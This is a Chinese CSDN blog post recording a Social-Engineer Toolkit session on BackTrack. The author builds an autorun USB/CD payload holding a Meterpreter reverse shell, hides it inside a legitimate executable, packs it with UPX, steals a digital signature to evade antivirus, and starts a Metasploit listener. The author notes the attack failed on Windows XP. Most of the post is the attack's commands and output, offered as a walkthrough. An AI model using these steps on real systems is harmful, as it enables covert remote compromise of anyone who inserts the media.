Infectious Media Generator失败

最新推荐文章于 2023-06-21 01:05:09 发布
最新推荐文章于 2023-06-21 01:05:09 发布
阅读量1.2k 收藏
点赞数
分类专栏: backtrack metasploit SET
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9205009
版权
backtrack 同时被 3 个专栏收录
78 篇文章 0 订阅
订阅专栏
metasploit
73 篇文章 0 订阅
订阅专栏
SET
19 篇文章 0 订阅
订阅专栏

操作如下:

root@bt:/pentest/exploits/set# ./set


             01011001011011110111010100100000011100
             10011001010110000101101100011011000111
             10010010000001101000011000010111011001
             10010100100000011101000110111100100000
             01101101011101010110001101101000001000
             00011101000110100101101101011001010010
             00000110111101101110001000000111100101
             10111101110101011100100010000001101000
             01100001011011100110010001110011001000
             00001110100010110100101001001000000101
             01000110100001100001011011100110101101
             11001100100000011001100110111101110010
             00100000011101010111001101101001011011
             10011001110010000001110100011010000110
             01010010000001010011011011110110001101
             10100101100001011011000010110101000101
             01101110011001110110100101101110011001
             01011001010111001000100000010101000110
             11110110111101101100011010110110100101
             11010000100000001010100110100001110101
             011001110111001100101010

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1


             01011001011011110111010100100000011100
             10011001010110000101101100011011000111
             10010010000001101000011000010111011001
             10010100100000011101000110111100100000
             01101101011101010110001101101000001000
             00011101000110100101101101011001010010
             00000110111101101110001000000111100101
             10111101110101011100100010000001101000
             01100001011011100110010001110011001000
             00001110100010110100101001001000000101
             01000110100001100001011011100110101101
             11001100100000011001100110111101110010
             00100000011101010111001101101001011011
             10011001110010000001110100011010000110
             01010010000001010011011011110110001101
             10100101100001011011000010110101000101
             01101110011001110110100101101110011001
             01011001010111001000100000010101000110
             11110110111101101100011010110110100101
             11010000100000001010100110100001110101
             011001110111001100101010

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

   1) File-Format Exploits
   2) Standard Metasploit Executable

  99) Return to Main Menu

set:infectious>2
set:payloads> Enter the IP address for the payload (reverse):192.168.1.11

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

set:payloads>2

Below is a list of encodings to try and bypass AV. 

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

set:encoding>16
set:payloads> PORT of the listener [443]:
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate
[*] Your attack has been created in the SET home directory folder 'autorun'
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
[-] The payload can be found in the SET home directory.

此时会在SET目录生成一个autorun的目录: 

root@bt:/pentest/exploits/set# ls
autorun  config  modules  readme  reports  set  set-automate  set-proxy  set-update  setup.py  set-web  src

然后开始监听: 

set> Start the listener now? [yes|no]: yes
[-] Please wait while the Metasploit listener is loaded...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > 
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

我用UltraISO把autorun里的文件制作成iso文件,在XP里打开,失败,不管是中文版还是英文版。


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Global Infectious Substance Packaging Report.docx
07-02
根据提供的文档信息,我们可以深入探讨有关全球感染性物质包装市场的几个关键知识点: ### 一、市场概况 #### 市场规模与增长预测 - **2022年市场规模**:全球感染性物质包装市场在2022年的价值为**xx百万美元**。...
Modeling Infectious Diseases in Humans and Animals.pdf
07-06
《Modeling Infectious Diseases in Humans and Animals》一书就是这样一个及时且成功的尝试,它填补了这一知识空缺。 在本书中,作者Matthew James Keeling和Pejman Rohani介绍了传染病流行病学数学建模的重要话题...
Infectious Media Generator成功
天元喜羊羊的博客
06-29 1239
刚才失败了,然后我把BT5虚拟机回退到先前的一个snapshot,然后再次操作,就成功了: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set Copyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLC All righ
传染性媒体生成器和USB HID攻击向量——SET工具包
渗透测试
06-22 470
1.传染性媒体生成器是一个简单的攻击向量,可以烧到CD/DVD上或放到USB驱动器上 具体生成方法如下: Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based
渗透测试 ( 9 ) --- 社会工程攻击工具 setoolkit
freeking101的博客
07-10 2023
SET 利用人们的好奇心、信任、贪婪及一些愚蠢的错误,攻击人们自身存在的弱点。SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet 攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。......
社会工程学
最新发布
QQ2891287744的博客
06-21 226
社会工程学是一个通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的学科。黑客米特尼克(Mitnick)在他的作品《反欺骗的艺术》中第一次提到社会工程学他认为长期以来在网络安全领域中,社会工程学指的就是利用受害者的心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱的手段,一些犯罪分子通过欺骗等手段来谋取利益作来,利用社会工程学谋取利益的人越来越多,这给网络安全带来了极大的隐患。 在Kali Linux 2中包含一个非常流行的工具包一一社会工程学工具包 (Social Engine
Fast infectious diseases diagnostics based on microfluidic biochip system
02-22
In this paper, a sensitive DNA isothermal amplifi-cation method for fast clinical infectious diseases diagnostics at aM concentrations of DNA was developed using a polycarbonate (PC) microfluidic ...
Kali linux 下配置社会工程学工具包SET
weixin_51380973的博客
08-24 841
对于Kali 2021.4a和Kali 2022.3,以上配置文件未发现,在/etc/setoolkit/中发现set.config文件可以配置。内置/usr/share/set/readme/的《User_Manual.pdf》三、在SET工具包根目录下的config/core/set_config文件中配置。一、在SET工具包根目录下的config/set_config文件中配置。二、在SET工具包根目录下的config/set_config文件中配置。来自SET 2022/8最新版8.0.3。
20169219 2016-2017-2《网络攻防》第八周作业
weixin_30807779的博客
04-21 180
实验报告 20169219 2016-2017-2 网络攻防实验环境的搭建 Kali漏洞利用之SET Social Engineering Toolkit(SET)是一个开源、Python驱动的社会工程学渗透测试工具。提供了非常丰富的攻击向量库。是开源的社会工程学利用套件,通常结合metasploit来使用 打开setoolkit界面如下 步骤: 一、命令行下输入setoolkit打开SET套件...
【安全系列】setoolkit钓鱼
叁滴水 的博客
07-26 1万+
setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。 setoolkit 目录结构 modules readme README.md requirements.txt seautomate seproxy setoolkit setup.py seupdate src **setoolkit启动 ** 通过./setoolkit启动。看到如下图形,启动成功。 默认会有如下选项 Social-Engineering Attacks
bt5 note[4] 社会工程学工具
www.i201314.net
07-10 1364
1. java applet attack method    set工具   root@bt:/pentest/exploits/set/config# gedit set_config 需要修改 到 #METASPLOIT_PATH=/pentest/exploits/framework3   (一定要修改成这个路径,其他的测试的都没有用) 设置 EMAIL_PROVIDER=GM
MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)...
weixin_33725722的博客
05-22 774
           不多说,直接上干货!     首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploits/set/set_config下。 APACHE_SERVER=ONSELF_SIGNED_APPLEF=ONAUTO_DETECT=ON       如果,你也是跟我一样,使用的是kali linux 2016.2(rolling),...
matasploit+shellcode编码学习
weixin_30650039的博客
03-16 468
msfpescan ,msfencode 等命令使用 首先下面额指令都是我用到时记录的,可以说是经常用到吧 先找到memdump.exe文件: C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe 在CMD下 运行 memdump.exe 进程PID c:\a...
Multi-Attack Web Method
天元喜羊羊的博客
06-29 2267
操作如下: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10
Set+Metasploit+Ettercap渗透欺骗拿Shell
suixinxxx的博客
11-09 831
社会工程学工具集Social-Engineer Toolkit 是一款有效帮助于社工工程学的工具,被收录到backtrack 工具无论在国内还是国外,不受渗透环境影响。 Metasploit 是一款框架式渗透工具,现在逐渐变成一个攻击开发平台。 Metasploit给渗透带来极大的方便。特别是后渗透,持续控制方面。 Ettercap被动式嗅探,内网安全检测软件。
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
"infectious_name": { "type": "text", "fields": { "keyword": { "type": "keyword", "ignore_above": 256 } }, "analyzer": "ik_max_word" }上面是我es mapping的字段定义,请解释一下里面参数的意思
06-03
这段代码是 ElasticSearch 中的 mapping 字段定义,定义了一个名为 "infectious_name" 的字段,该字段的类型为 "text"。下面是参数的解释: - "type": 定义字段的数据类型。在这里,字段的数据类型为 "text",表示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值